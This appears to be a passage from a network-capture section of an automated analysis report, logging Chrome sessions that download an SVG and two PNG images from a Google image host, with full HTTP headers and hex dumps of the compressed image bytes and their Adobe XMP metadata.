                                                                                                                                                                                                                                                                                          X-Cloud-Trace-Context: 1b240eef7399fa6e164210cae6f58762
                                                                                                                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                                                                                                                          Server: Google Frontend
                                                                                                                                                                                                                                                                                          Content-Length: 450
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:40 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:41:41 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=1
                                                                                                                                                                                                                                                                                          ETag: "yqeqwg"
                                                                                                                                                                                                                                                                                          Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                          Age: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC450INData Raw: 1f 8b 08 00 00 00 00 00 02 ff 7c 52 c1 6e 9c 30 10 bd e7 2b a6 ce 25 91 6a 83 21 d9 35 2b 20 6a aa b6 f7 6e 7b 5e 11 70 c0 5a d6 46 b6 bb b0 fd fa 1a 63 9a 28 6a 33 07 98 99 37 7a 6f 66 3c f9 c3 74 ea e1 cc b5 11 4a 16 88 92 18 01 97 b5 6a 84 6c 0b f4 f3 c7 57 cc d0 43 79 95 9b 73 0b a3 68 6c e7 6a d8 30 21 e8 b8 68 3b eb a2 64 8e ce 82 8f 8f 6a 2a 50 0c 31 50 06 34 71 b9 17 52 8a c0 c9 48 53 a0 ce da 61 17 45 e3 38 92 31 25 4a b7 51 12 c7 71 e4 e8 43 c9 6e ea 85 3c fe ab 90 66 59 16 79 14 95 57 e0 2c ff 80 31 7c e3 92 eb ca 2a bd 83 fd 91 db ba 83 fb 0d 49 e1 86 d1 2d dd dc 02 86 59 d1 38 49 e3 51 52 ab 13 60 1c 08 ac b0 3d 2f 45 7d 38 f2 cb 93 aa 74 73 a8 b4 56 e3 e1 3b 37 d6 2d e0 90 6e 86 29 8f 96 aa 45 b2 e1 a6 2e 3f 6b 5e 59 de b8 85 d8 2e a8 92 3c
                                                                                                                                                                                                                                                                                          Data Ascii: |Rn0+%j!5+ jn{^pZFc(j37zof<tJjlWCyshlj0!h;dj*P1P4qRHSaE81%JQqCn<fYyW,1|*I-Y8IQR`=/E}8tsV;7-n)E.?k^Y.<


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          105192.168.2.749880142.250.185.974435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC544OUTGET /ZbVcVI5gznupH4HWFYJkqkZnHDAC09j3j3LY1PG0DYacRBX2Pko8UhGbp9Y7bhb3DUROSOs-hort72vxN96ce6LxOkzZySbUTym6faGr=w2000 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: lh3.googleusercontent.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                                                                          Content-Disposition: inline;filename="unnamed.png"
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: fife
                                                                                                                                                                                                                                                                                          Content-Length: 1174944
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:03:38 GMT
                                                                                                                                                                                                                                                                                          Expires: Sat, 28 Sep 2024 14:03:38 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                                                                          Age: 2282
                                                                                                                                                                                                                                                                                          ETag: "v1"
                                                                                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC856INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 02 d0 08 06 00 00 00 cf 7d dd 56 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 f6 65 58 49 66 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 25 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 98 87 69 00 04 00 00 00 01 00 00 00 ac 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 41 64 6f 62 65 20 41 66 74 65 72 20 45 66 66 65 63 74 73 20 32 30 32 30 20 28 4d 61 63 69 6e 74 6f 73 68 29 00 00 32 30 32 32 3a 30 39 3a 30 38 20 31 37 3a 30 30 3a 31 33 00 00 04 90 04 00 02 00 00 00 14 00 00 00 e2 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00
                                                                                                                                                                                                                                                                                          Data Ascii: PNGIHDR}VsRGBeXIfMM*bj(1%r2iHHAdobe After Effects 2020 (Macintosh)2022:09:08 17:00:13
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 78 6d 6c 6e 73 3a 70 68 6f 74 6f 73 68 6f 70 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 70 68 6f 74 6f 73 68 6f 70 2f 31 2e 30 2f 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 65 78 69 66 3a 43 6f 6c 6f 72 53 70 61 63 65 3e 36 35 35 33 35 3c 2f 65 78 69 66 3a 43 6f 6c 6f 72 53 70 61 63 65 3e 0a 20 20 20 20 20 20 20 20 20 3c 65 78 69 66 3a 50 69 78 65 6c 58 44 69 6d 65 6e 73 69 6f 6e 3e 31 39 32 30 3c 2f 65 78 69 66 3a 50 69 78 65 6c 58 44 69 6d 65 6e 73 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 3c 65 78 69 66 3a 50 69 78 65 6c 59 44 69 6d 65 6e 73 69 6f 6e 3e 31 30 38 30 3c 2f 65 78 69 66 3a 50 69 78 65 6c 59 44 69 6d 65 6e 73 69 6f 6e 3e 0a 20 20 20
                                                                                                                                                                                                                                                                                          Data Ascii: obe.com/xap/1.0/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/"> <exif:ColorSpace>65535</exif:ColorSpace> <exif:PixelXDimension>1920</exif:PixelXDimension> <exif:PixelYDimension>1080</exif:PixelYDimension>
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: 20 20 20 20 3c 2f 72 64 66 3a 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 72 64 66 3a 53 65 71 3e 0a 20 20 20 20 20 20 20 20 20 3c 2f 78 6d 70 4d 4d 3a 48 69 73 74 6f 72 79 3e 0a 20 20 20 20 20 20 20 20 20 3c 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3e 78 6d 70 2e 64 69 64 3a 36 37 32 36 64 65 63 37 2d 38 30 36 30 2d 34 34 36 61 2d 38 66 39 37 2d 31 63 36 35 30 61 36 39 61 64 39 66 3c 2f 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3e 0a 20 20 20 20 20 20 20 20 20 3c 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 63 63 36 63 64 37 38 39 2d 34 38 37 64 2d 37 62 34 63 2d 38 37 39 31 2d 62 30 33 34 31 38 35 33 33 62 36 65
                                                                                                                                                                                                                                                                                          Data Ascii: </rdf:li> </rdf:Seq> </xmpMM:History> <xmpMM:OriginalDocumentID>xmp.did:6726dec7-8060-446a-8f97-1c650a69ad9f</xmpMM:OriginalDocumentID> <xmpMM:DocumentID>adobe:docid:photoshop:cc6cd789-487d-7b4c-8791-b03418533b6e
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: 13 2b 38 0f 5b 98 c1 d2 8b 10 39 73 dc 7e f2 06 9b a0 93 3f ef f8 45 1b 1c c6 dd a2 e6 43 db 7e ba d6 4e f0 92 89 72 63 03 66 6b 31 f5 c0 bc 27 f7 e1 60 ae d2 13 49 79 c1 92 d3 33 78 5f c4 29 9d 38 ed 78 c9 5e 19 43 3e b6 91 9f 51 20 9f 18 f8 13 c4 c4 03 db 88 ad c6 60 4d da ac 5b f8 f9 75 fc ee e8 7d 31 a7 77 ad 79 0b e6 ce 1b 7c fa f1 23 36 47 b6 1a 83 1b 2b 7c 89 5f 6a f5 61 5e e3 a9 a1 1e aa 81 ea fa 74 f5 b5 66 0c 99 a7 d8 16 ff 59 f7 28 67 7e 95 ed 3a d2 4d d8 28 a9 6b 59 ce 8d 31 a6 56 de 9e c9 cf 46 b9 22 8e d3 f0 90 77 8f 23 52 e8 45 60 05 da b5 a2 d2 41 25 a6 a3 7f fb e0 9f 54 5d 36 cf db bf 44 62 e0 58 9d 28 d2 43 a6 a0 e9 63 31 8f f0 2d 5d e8 38 fb b9 61 3d 76 82 cb 18 e5 a5 af c6 92 bc 48 3e e1 6b 7e 37 fe bb a7 69 ee e3 3d dd f9 49 be ff 48
                                                                                                                                                                                                                                                                                          Data Ascii: +8[9s~?EC~Nrcfk1'`Iy3x_)8x^C>Q `M[u}1wy|#6G+|_ja^tfY(g~:M(kY1VF"w#RE`A%T]6DbX(Cc1-]8a=vH>k~7i=IH
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: a4 ee 98 cf 18 3f 6b 2f e6 2b 9e ae 95 5d 7f 8d 95 4b 1c 31 e9 f6 ab a3 83 64 2e b5 ae b7 3b 10 af d0 5e d3 d6 ee 95 bc b7 d9 74 ec a5 c2 4d 4a 20 1a 8f c6 89 e1 86 bf 1b 68 ea 13 41 3a 26 96 de f8 10 3b 7e 86 1f 4b 90 03 05 3c b9 0b 49 d7 53 2c 8b a5 ff 0d b8 3c 7b a8 bd 8b dd 9b 85 be 29 04 be 1a cc 55 8c 6b 3b f6 72 b7 1f 58 36 36 de 4c e7 dc 6d d4 41 b5 b2 0f 3c 6c 6c 20 d2 d0 bd 65 9d b3 7e 1c 1f 62 cf d4 b1 0f f4 96 b1 27 00 ba 22 91 7d 4a a3 75 d6 ab d0 f5 7a 74 8e 94 d7 62 45 42 a8 0d f5 5b 6e d6 9e 94 aa 45 1a 1e f4 70 0d 2d 02 71 79 65 bb cc 9f 1e 8a 05 44 e3 f7 09 63 15 b7 13 5e f2 51 7d e4 ef fa 5f ac ce 1e 58 6b 17 35 6c f5 71 9b 38 b1 7b 7a 8f ec cd f0 0f d7 02 00 fe 46 41 b7 0a f1 30 8a 6d 07 cf 31 1a f7 7f 05 8f bd 5d 95 7a e3 2d 46 70 99
                                                                                                                                                                                                                                                                                          Data Ascii: ?k/+]K1d.;^tMJ hA:&;~K<IS,<{)Uk;rX66LmA<ll e~b'"}JuztbEB[nEp-qyeDc^Q}_Xk5lq8{zFA0m1]z-Fp
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: 23 17 48 63 92 86 f6 c9 05 a3 79 73 6e 48 60 45 00 5e 75 af 01 5c d6 3b 6e c0 fd ba c0 b5 b2 b5 07 bd 8d 61 ba b8 52 8f 0a 46 d8 38 9d b8 5d 1a e8 6b 09 d6 f0 17 b7 b1 4e b6 18 5b de 8d d4 e6 d8 ad 04 ba 10 cc d9 fd c1 4c 68 63 30 7a 38 5d 85 c6 ea 82 da 4e d1 88 91 cc e8 0c 25 89 57 f4 f2 6b fb 05 54 3b c9 15 ba f7 95 1d e0 ae 13 6e fa 1c 0f cc 9b 39 73 74 dc 80 80 88 bc ba 53 6f f4 81 c4 36 8e a1 64 03 b5 b6 21 49 0f a5 e3 ef 6c 92 d3 4f c4 40 e7 65 1e 17 5c fc 48 61 1b 1b e2 5a 53 3e bd 1c bf 9b 3b 20 a7 84 56 3d 3d 9e bc 3a da 97 6d ad 51 a8 44 8f 58 d1 b2 b8 f5 61 a9 2f ce c6 21 f4 9c 91 96 9f 8a 8d d8 9d f5 e2 60 21 3e f4 c6 0a 81 92 78 b8 e4 7e cd b8 c7 8f dd bc 85 7f 7d 47 fc ef 94 e3 cb d8 20 56 f4 ef f8 dd c7 eb 77 f5 dc a1 ce cd 2b c2 18 9d 4e
                                                                                                                                                                                                                                                                                          Data Ascii: #HcysnH`E^u\;naRF8]kN[Lhc0z8]N%WkT;n9stSo6d!IlO@e\HaZS>; V==:mQDXa/!`!>x~}G Vw+N
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: f1 42 2e 0c 21 ed 03 58 6f 4e e5 cc 01 d9 b1 63 8d 5e 12 76 81 f4 f3 32 b9 8a 50 0a 6e 6c 59 3f ec ca c1 31 02 90 61 35 16 70 ee 98 d2 01 27 08 6c c8 27 63 d2 ec 9f f0 a4 17 5a fc c1 fe a5 ad 8e 08 9d d2 21 19 4b d2 30 be e9 ad 1d 1e a7 35 3c ea d4 40 79 1b cf f5 1c 9e ca a0 0b 2c 5a e4 2a 75 73 8d 8d 94 3f 65 5d 7d 97 6d f4 df 4a 64 f9 11 ab ca b4 c0 b8 84 8d 35 7a 47 38 ac c6 8a 03 18 c8 68 07 70 f0 4d 7b 75 79 cd 17 1f 86 ca fa bc 54 e9 5c 37 e9 0b 26 9f 54 c1 f6 46 40 64 f9 ef 87 fa 54 0e 38 9b 57 70 ac 24 3e 18 81 bb d8 87 fa da a8 09 0b 37 b6 eb c4 58 71 04 f1 75 f8 cc ef 08 b2 57 e8 b6 fc 70 59 59 3e 21 76 a3 89 ad 10 e6 46 79 25 a4 81 8b bb 53 c0 a7 6c fc 86 fc db a7 07 b9 b1 59 15 a3 a3 fd 89 e4 4d e7 af c0 89 17 05 d9 7b dd 9c 4b 5a b2 49 c6 6c
                                                                                                                                                                                                                                                                                          Data Ascii: B.!XoNc^v2PnlY?1a5p'l'cZ!K05<@y,Z*us?e]}mJd5zG8hpM{uyT\7&TF@dT8Wp$>7XquWpYY>!vFy%SlYM{KZIl
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: 23 76 62 11 96 bd 8c 13 f7 95 27 0e 48 73 f9 af 1f e9 81 41 da 9e 6d a6 9f 15 17 1a 48 45 60 c3 fe 07 df 03 03 05 2c ef 92 18 89 d2 a4 47 64 f5 d1 be 17 6d 99 4e 63 83 3f a3 9f b9 43 17 a9 c0 99 2e d3 82 46 0a 56 ec e6 5c 82 87 c4 2e f2 be 39 14 be bd b6 6b f1 1d 3b bc de 1c 5c 82 7a b7 e3 8e 2d fb 70 ff 3e 46 17 3b 63 59 9b 16 b6 63 1b 7a 72 c8 31 dc cd 1e 31 8b e1 e0 78 53 b6 f1 08 1f 1b 1c 3f 69 86 3d d9 98 e1 1a 7f d6 b4 85 48 86 bd fe 7b a4 c5 ab c5 19 00 ae 98 33 3a c6 67 82 84 91 1a 1a dc c8 f5 86 8b c0 44 7e 58 a6 27 fd 2d fb 8e 2a 3e 38 8a eb 07 b6 ae 10 98 14 a1 0e 90 a4 c6 61 3a a5 70 c0 b6 e6 75 25 91 c1 cf f5 10 9e 96 87 0d e7 ea 39 7d 2a 14 eb 8a c3 d8 32 3c e4 48 bf ab 27 04 1e e2 a5 cd 27 4a 0a 15 0f 6e e6 92 f7 14 e2 67 81 17 3b ef 4c f4
                                                                                                                                                                                                                                                                                          Data Ascii: #vb'HsAmHE`,GdmNc?C.FV\.9k;\z-p>F;cYczr11xS?i=H{3:gD~X'-*>8a:pu%9}*2<H''Jng;L
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: 14 59 e5 e8 e1 01 b8 31 b4 1e 3a f6 e7 e5 f7 7f 3f bc d3 3e 1b ef f0 f9 8e a1 ff 6c 47 67 8d 3b 5a 2d 91 e1 cb 9a 29 8e 5f c0 d0 6f 4c b5 0b 99 e0 87 a6 9d f4 a7 ea 3b b5 da 5e fa ce 3b e3 a4 53 f0 55 56 b6 48 cb 23 29 94 9c a3 d9 3c 89 4b 62 a2 87 18 f5 1d 2e 56 85 f2 69 57 a1 b0 4c 59 4e e0 62 6d 5f 48 4f e9 02 16 f9 e1 0d 99 75 6b 20 50 20 23 f2 14 31 a7 46 1e 5a 06 9f ba 1a 62 a4 63 48 1e c6 3f d0 8a 18 7e 63 5b 5b fa 9d 20 b1 5c e3 ca c3 48 90 bf ea c9 c3 bf dd 30 89 1d 7d 8e b7 4a f1 79 2e d0 ea 45 f7 bc d4 49 5f 30 05 6f 7d c4 7a c2 94 d4 f0 ee ab 9b 2b c8 17 3a d8 1d 57 e8 2d b6 93 7b c4 d8 37 57 b2 c0 9a c3 a1 61 bd f9 16 0c 1f 86 04 fc 8d fc 8b 28 72 be 8b 08 4c 64 bd 56 32 90 53 1a e2 5a b3 e3 e7 b8 42 4a 41 1e ba f3 1e 5c fc 6a 8f 39 dd cd 50
                                                                                                                                                                                                                                                                                          Data Ascii: Y1:?>lGg;Z-)_oL;^;SUVH#)<Kb.ViWLYNbm_HOuk P #1FZbcH?~c[[ \H0}Jy.EI_0o}z+:W-{7Wa(rLdV2SZBJA\j9P
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: 1c 74 f8 70 6f 30 3f 85 bb f7 6f 7d cf a0 6a 24 d2 10 c9 9f d6 9c d4 2c 1a 46 63 05 6a 47 88 2f 0a 7d cd 77 2c ed 82 d5 45 e5 23 f3 ab 18 8f 8e 55 35 42 98 67 b4 32 56 e0 12 3a 7d 47 5b 1b 9e bb 40 a5 73 72 0b 2f b0 a1 0b 0f 42 01 0a 98 58 e9 7b 55 d0 f5 ba 27 dc a7 03 5c a4 37 36 d4 41 ed b2 a8 81 32 c4 4a cc 49 dd 0b cc b0 35 c2 a5 43 a2 e0 17 17 83 2d a4 25 c5 79 30 67 da 60 1d 33 20 a4 c0 63 18 0c 40 fd 13 ea 86 81 ce e2 73 d1 eb 17 01 77 d1 26 92 fd 97 12 f8 00 76 bf ab 2d 95 e8 2a 65 36 8f 83 87 0d d5 59 42 f3 27 71 76 7d 0b 6f 36 0b 3e 20 0d 1f 61 69 3f 3e 52 a0 9d 08 d8 af ad a1 c3 be 85 ea a8 5b 52 b1 d2 b2 2f cc f8 e3 da 71 16 10 30 66 7c 15 0e 67 fa e4 03 ef 86 0f 4a cd ab 96 8d f3 b3 56 7a 8d db 18 84 aa fa 59 39 8c db da 9e 8f a1 d3 e7 06 0a
                                                                                                                                                                                                                                                                                          Data Ascii: tpo0?o}j$,FcjG/}w,E#U5Bg2V:}G[@sr/BX{U'\76A2JI5C-%y0g`3 c@sw&v-*e6YB'qv}o6> ai?>R[R/q0f|gJVzY9


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          106192.168.2.749881142.250.185.974435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC542OUTGET /ZpM4XtnnmV5u9Ma4HVH5__398H-zbdEWY6gHoAInHWFrca2xBeoEBkNiVENs5baX82LjnyEXvZNX7ML3gHTa401Vg1gXKsWrEar8zQ=w2000 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: lh3.googleusercontent.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                                                                          Content-Disposition: inline;filename="unnamed.png"
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: fife
                                                                                                                                                                                                                                                                                          Content-Length: 1176378
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:03:47 GMT
                                                                                                                                                                                                                                                                                          Expires: Sat, 28 Sep 2024 14:03:47 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                                                                          Age: 2273
                                                                                                                                                                                                                                                                                          ETag: "v1"
                                                                                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC856INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 02 d0 08 06 00 00 00 cf 7d dd 56 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 f6 65 58 49 66 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 25 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 98 87 69 00 04 00 00 00 01 00 00 00 ac 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 41 64 6f 62 65 20 41 66 74 65 72 20 45 66 66 65 63 74 73 20 32 30 32 30 20 28 4d 61 63 69 6e 74 6f 73 68 29 00 00 32 30
                                                                                                                                                                                                                                                                                          Data Ascii: PNGIHDR}VgAMAa cHRMz&u0`:pQ<eXIfMM*bj(1%r2iHHAdobe After Effects 2020 (Macintosh)20
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: 2f 74 69 66 66 2f 31 2e 30 2f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 78 6d 6c 6e 73 3a 78 6d 70 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 78 6d 6c 6e 73 3a 70 68 6f 74 6f 73 68 6f 70 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 70 68 6f 74 6f 73 68 6f 70 2f 31 2e 30 2f 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 65 78 69 66 3a 43 6f 6c 6f 72 53 70 61 63 65 3e 31 3c 2f 65 78 69 66 3a 43 6f 6c 6f 72 53 70 61 63 65 3e 0a 20 20 20 20 20 20 20 20 20 3c 65 78 69 66 3a 50 69 78 65 6c 58 44 69 6d 65 6e 73 69 6f 6e 3e 31 32 38 30 3c 2f 65 78 69 66 3a 50 69 78 65 6c 58 44 69 6d 65 6e 73 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 3c 65 78 69 66 3a 50 69 78 65
                                                                                                                                                                                                                                                                                          Data Ascii: /tiff/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/"> <exif:ColorSpace>1</exif:ColorSpace> <exif:PixelXDimension>1280</exif:PixelXDimension> <exif:Pixe
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: 6e 74 49 44 3e 0a 20 20 20 20 20 20 20 20 20 3c 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 65 33 37 64 35 30 63 39 2d 66 34 38 30 2d 63 64 34 37 2d 38 37 38 66 2d 31 34 61 36 38 61 36 39 33 38 31 35 3c 2f 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3e 0a 20 20 20 20 20 20 20 20 20 3c 78 6d 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3e 78 6d 70 2e 69 69 64 3a 63 64 35 31 38 65 36 62 2d 61 39 36 34 2d 34 35 62 36 2d 39 35 39 38 2d 63 38 39 62 35 33 32 32 33 31 64 61 3c 2f 78 6d 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3e 0a 20 20 20 20 20 20 20 20 20 3c 74 69 66 66 3a 52 65 73 6f 6c 75 74 69 6f 6e 55 6e 69 74 3e 32 3c 2f 74 69 66 66 3a 52 65 73 6f 6c 75 74 69 6f 6e 55 6e 69 74 3e
                                                                                                                                                                                                                                                                                          Data Ascii: ntID> <xmpMM:DocumentID>adobe:docid:photoshop:e37d50c9-f480-cd47-878f-14a68a693815</xmpMM:DocumentID> <xmpMM:InstanceID>xmp.iid:cd518e6b-a964-45b6-9598-c89b532231da</xmpMM:InstanceID> <tiff:ResolutionUnit>2</tiff:ResolutionUnit>
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:40 UTC1390INData Raw: 0d 0d f4 07 28 80 f2 5e e5 e5 fa be b0 8e 62 48 62 8b cd 7f 5a e2 ab eb 3b e5 2b fb 19 dc da 94 fe c6 50 17 3e 32 d7 b5 cf 75 04 bf a0 75 cd 0c d4 cd 8b b1 7c 9b 38 de 74 d0 d8 1c c0 eb 63 f9 d0 07 3d 30 de cf 97 35 45 5b 2d 8f 8f e6 99 3a 8d 15 7c f1 57 1f 44 69 6c 63 8b f3 6f e2 bf b2 9e 6b 4c b2 c4 5d b0 29 e9 2f fc 92 72 3c 63 e2 1a 26 fe 37 85 ae ed df e3 c9 c9 3c d1 d6 29 8e ab 6b 16 d1 8b 4c fc c0 f6 27 fc f2 fc aa 19 cd 51 31 e1 7d c6 5f fc 12 c3 70 68 ab f9 ab 1f bb 56 0b ad 79 6a 49 df 61 eb d5 29 7b d1 1a 26 d7 5e 74 5e bb ed b5 0d fe 92 df 59 1b 96 5f 7a d6 bb 4b 7e 45 8d cc 54 92 75 da 46 7d e3 1d 23 35 94 f2 f6 fe b3 b8 8e 09 3c 8e 11 ec e8 53 87 1e 7a fe c2 be ac 07 e9 68 3f 52 e1 0b 8e 83 d7 31 0e 86 06 d3 76 2e c7 f3 47 d6 25 0c 0e 3f 6a
                                                                                                                                                                                                                                                                                          Data Ascii: (^bHbZ;+P>2uu|8tc=05E[-:|WDilcokL])/r<c&7<)kL'Q1}_phVyjIa){&^t^Y_zK~ETuF}#5<Szh?R1v.G%?j
